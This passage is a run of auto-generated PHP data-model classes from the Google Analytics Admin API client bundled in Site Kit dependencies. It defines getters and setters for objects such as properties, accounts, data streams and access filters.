See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'resourceType'; /** * @var string[] */ public $action; /** * @var string[] */ public $actorEmail; /** * @var string */ public $earliestChangeTime; /** * @var string */ public $latestChangeTime; /** * @var int */ public $pageSize; /** * @var string */ public $pageToken; /** * @var string */ public $property; /** * @var string[] */ public $resourceType; /** * @param string[] */ public function setAction($action) { $this->action = $action; } /** * @return string[] */ public function getAction() { return $this->action; } /** * @param string[] */ public function setActorEmail($actorEmail) { $this->actorEmail = $actorEmail; } /** * @return string[] */ public function getActorEmail() { return $this->actorEmail; } /** * @param string */ public function setEarliestChangeTime($earliestChangeTime) { $this->earliestChangeTime = $earliestChangeTime; } /** * @return string */ public function getEarliestChangeTime() { return $this->earliestChangeTime; } /** * @param string */ public function setLatestChangeTime($latestChangeTime) { $this->latestChangeTime = $latestChangeTime; } /** * @return string */ public function getLatestChangeTime() { return $this->latestChangeTime; } /** * @param int */ public function setPageSize($pageSize) { $this->pageSize = $pageSize; } /** * @return int */ public function getPageSize() { return $this->pageSize; } /** * @param string */ public function setPageToken($pageToken) { $this->pageToken = $pageToken; } /** * @return string */ public function getPageToken() { return $this->pageToken; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param string[] */ public function setResourceType($resourceType) { $this->resourceType = $resourceType; } /** * @return string[] */ public function getResourceType() { return $this->resourceType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaSearchChangeHistoryEventsRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaDataSharingSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var bool */ public $sharingWithGoogleAnySalesEnabled; /** * @var bool */ public $sharingWithGoogleAssignedSalesEnabled; /** * @var bool */ public $sharingWithGoogleProductsEnabled; /** * @var bool */ public $sharingWithGoogleSupportEnabled; /** * @var bool */ public $sharingWithOthersEnabled; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param bool */ public function setSharingWithGoogleAnySalesEnabled($sharingWithGoogleAnySalesEnabled) { $this->sharingWithGoogleAnySalesEnabled = $sharingWithGoogleAnySalesEnabled; } /** * @return bool */ public function getSharingWithGoogleAnySalesEnabled() { return $this->sharingWithGoogleAnySalesEnabled; } /** * @param bool */ public function setSharingWithGoogleAssignedSalesEnabled($sharingWithGoogleAssignedSalesEnabled) { $this->sharingWithGoogleAssignedSalesEnabled = $sharingWithGoogleAssignedSalesEnabled; } /** * @return bool */ public function getSharingWithGoogleAssignedSalesEnabled() { return $this->sharingWithGoogleAssignedSalesEnabled; } /** * @param bool */ public function setSharingWithGoogleProductsEnabled($sharingWithGoogleProductsEnabled) { $this->sharingWithGoogleProductsEnabled = $sharingWithGoogleProductsEnabled; } /** * @return bool */ public function getSharingWithGoogleProductsEnabled() { return $this->sharingWithGoogleProductsEnabled; } /** * @param bool */ public function setSharingWithGoogleSupportEnabled($sharingWithGoogleSupportEnabled) { $this->sharingWithGoogleSupportEnabled = $sharingWithGoogleSupportEnabled; } /** * @return bool */ public function getSharingWithGoogleSupportEnabled() { return $this->sharingWithGoogleSupportEnabled; } /** * @param bool */ public function setSharingWithOthersEnabled($sharingWithOthersEnabled) { $this->sharingWithOthersEnabled = $sharingWithOthersEnabled; } /** * @return bool */ public function getSharingWithOthersEnabled() { return $this->sharingWithOthersEnabled; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataSharingSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaDataSharingSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @var string */ public $orderType; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string */ public function setOrderType($orderType) { $this->orderType = $orderType; } /** * @return string */ public function getOrderType() { return $this->orderType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessFilter extends \Google\Site_Kit_Dependencies\Google\Model { protected $betweenFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessBetweenFilter::class; protected $betweenFilterDataType = ''; /** * @var string */ public $fieldName; protected $inListFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessInListFilter::class; protected $inListFilterDataType = ''; protected $numericFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessNumericFilter::class; protected $numericFilterDataType = ''; protected $stringFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessStringFilter::class; protected $stringFilterDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaAccessBetweenFilter */ public function setBetweenFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessBetweenFilter $betweenFilter) { $this->betweenFilter = $betweenFilter; } /** * @return GoogleAnalyticsAdminV1alphaAccessBetweenFilter */ public function getBetweenFilter() { return $this->betweenFilter; } /** * @param string */ public function setFieldName($fieldName) { $this->fieldName = $fieldName; } /** * @return string */ public function getFieldName() { return $this->fieldName; } /** * @param GoogleAnalyticsAdminV1alphaAccessInListFilter */ public function setInListFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessInListFilter $inListFilter) { $this->inListFilter = $inListFilter; } /** * @return GoogleAnalyticsAdminV1alphaAccessInListFilter */ public function getInListFilter() { return $this->inListFilter; } /** * @param GoogleAnalyticsAdminV1alphaAccessNumericFilter */ public function setNumericFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessNumericFilter $numericFilter) { $this->numericFilter = $numericFilter; } /** * @return GoogleAnalyticsAdminV1alphaAccessNumericFilter */ public function getNumericFilter() { return $this->numericFilter; } /** * @param GoogleAnalyticsAdminV1alphaAccessStringFilter */ public function setStringFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessStringFilter $stringFilter) { $this->stringFilter = $stringFilter; } /** * @return GoogleAnalyticsAdminV1alphaAccessStringFilter */ public function getStringFilter() { return $this->stringFilter; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListCustomMetricsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'customMetrics'; protected $customMetricsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomMetric::class; protected $customMetricsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaCustomMetric[] */ public function setCustomMetrics($customMetrics) { $this->customMetrics = $customMetrics; } /** * @return GoogleAnalyticsAdminV1alphaCustomMetric[] */ public function getCustomMetrics() { return $this->customMetrics; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListCustomMetricsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListCustomMetricsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessMetricValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessMetricValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessMetricValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaProperty extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $account; /** * @var string */ public $createTime; /** * @var string */ public $currencyCode; /** * @var string */ public $deleteTime; /** * @var string */ public $displayName; /** * @var string */ public $expireTime; /** * @var string */ public $industryCategory; /** * @var string */ public $name; /** * @var string */ public $parent; /** * @var string */ public $propertyType; /** * @var string */ public $serviceLevel; /** * @var string */ public $timeZone; /** * @var string */ public $updateTime; /** * @param string */ public function setAccount($account) { $this->account = $account; } /** * @return string */ public function getAccount() { return $this->account; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param string */ public function setDeleteTime($deleteTime) { $this->deleteTime = $deleteTime; } /** * @return string */ public function getDeleteTime() { return $this->deleteTime; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setExpireTime($expireTime) { $this->expireTime = $expireTime; } /** * @return string */ public function getExpireTime() { return $this->expireTime; } /** * @param string */ public function setIndustryCategory($industryCategory) { $this->industryCategory = $industryCategory; } /** * @return string */ public function getIndustryCategory() { return $this->industryCategory; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setParent($parent) { $this->parent = $parent; } /** * @return string */ public function getParent() { return $this->parent; } /** * @param string */ public function setPropertyType($propertyType) { $this->propertyType = $propertyType; } /** * @return string */ public function getPropertyType() { return $this->propertyType; } /** * @param string */ public function setServiceLevel($serviceLevel) { $this->serviceLevel = $serviceLevel; } /** * @return string */ public function getServiceLevel() { return $this->serviceLevel; } /** * @param string */ public function setTimeZone($timeZone) { $this->timeZone = $timeZone; } /** * @return string */ public function getTimeZone() { return $this->timeZone; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaProperty'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'androidAppDataStreams'; protected $androidAppDataStreamsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAndroidAppDataStream::class; protected $androidAppDataStreamsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaAndroidAppDataStream[] */ public function setAndroidAppDataStreams($androidAppDataStreams) { $this->androidAppDataStreams = $androidAppDataStreams; } /** * @return GoogleAnalyticsAdminV1alphaAndroidAppDataStream[] */ public function getAndroidAppDataStreams() { return $this->androidAppDataStreams; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListConversionEventsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'conversionEvents'; protected $conversionEventsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaConversionEvent::class; protected $conversionEventsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaConversionEvent[] */ public function setConversionEvents($conversionEvents) { $this->conversionEvents = $conversionEvents; } /** * @return GoogleAnalyticsAdminV1alphaConversionEvent[] */ public function getConversionEvents() { return $this->conversionEvents; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListConversionEventsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListConversionEventsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaDataStreamWebStreamData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $defaultUri; /** * @var string */ public $firebaseAppId; /** * @var string */ public $measurementId; /** * @param string */ public function setDefaultUri($defaultUri) { $this->defaultUri = $defaultUri; } /** * @return string */ public function getDefaultUri() { return $this->defaultUri; } /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } /** * @param string */ public function setMeasurementId($measurementId) { $this->measurementId = $measurementId; } /** * @return string */ public function getMeasurementId() { return $this->measurementId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamWebStreamData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaDataStreamWebStreamData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessDateRange extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $endDate; /** * @var string */ public $startDate; /** * @param string */ public function setEndDate($endDate) { $this->endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDateRange::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessDateRange'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListDataStreamsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'dataStreams'; protected $dataStreamsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream::class; protected $dataStreamsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaDataStream[] */ public function setDataStreams($dataStreams) { $this->dataStreams = $dataStreams; } /** * @return GoogleAnalyticsAdminV1betaDataStream[] */ public function getDataStreams() { return $this->dataStreams; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListDataStreamsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListDataStreamsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessBetweenFilter extends \Google\Site_Kit_Dependencies\Google\Model { protected $fromValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaNumericValue::class; protected $fromValueDataType = ''; protected $toValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaNumericValue::class; protected $toValueDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaNumericValue */ public function setFromValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaNumericValue $fromValue) { $this->fromValue = $fromValue; } /** * @return GoogleAnalyticsAdminV1alphaNumericValue */ public function getFromValue() { return $this->fromValue; } /** * @param GoogleAnalyticsAdminV1alphaNumericValue */ public function setToValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaNumericValue $toValue) { $this->toValue = $toValue; } /** * @return GoogleAnalyticsAdminV1alphaNumericValue */ public function getToValue() { return $this->toValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessBetweenFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessBetweenFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccount extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $createTime; /** * @var bool */ public $deleted; /** * @var string */ public $displayName; /** * @var string */ public $gmpOrganization; /** * @var string */ public $name; /** * @var string */ public $regionCode; /** * @var string */ public $updateTime; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param bool */ public function setDeleted($deleted) { $this->deleted = $deleted; } /** * @return bool */ public function getDeleted() { return $this->deleted; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setGmpOrganization($gmpOrganization) { $this->gmpOrganization = $gmpOrganization; } /** * @return string */ public function getGmpOrganization() { return $this->gmpOrganization; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setRegionCode($regionCode) { $this->regionCode = $regionCode; } /** * @return string */ public function getRegionCode() { return $this->regionCode; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccount'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessQuotaStatus extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $consumed; /** * @var int */ public $remaining; /** * @param int */ public function setConsumed($consumed) { $this->consumed = $consumed; } /** * @return int */ public function getConsumed() { return $this->consumed; } /** * @param int */ public function setRemaining($remaining) { $this->remaining = $remaining; } /** * @return int */ public function getRemaining() { return $this->remaining; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessQuotaStatus'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessRow extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'metricValues'; protected $dimensionValuesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDimensionValue::class; protected $dimensionValuesDataType = 'array'; protected $metricValuesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessMetricValue::class; protected $metricValuesDataType = 'array'; /** * @param GoogleAnalyticsAdminV1betaAccessDimensionValue[] */ public function setDimensionValues($dimensionValues) { $this->dimensionValues = $dimensionValues; } /** * @return GoogleAnalyticsAdminV1betaAccessDimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } /** * @param GoogleAnalyticsAdminV1betaAccessMetricValue[] */ public function setMetricValues($metricValues) { $this->metricValues = $metricValues; } /** * @return GoogleAnalyticsAdminV1betaAccessMetricValue[] */ public function getMetricValues() { return $this->metricValues; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessRow::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessRow'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the 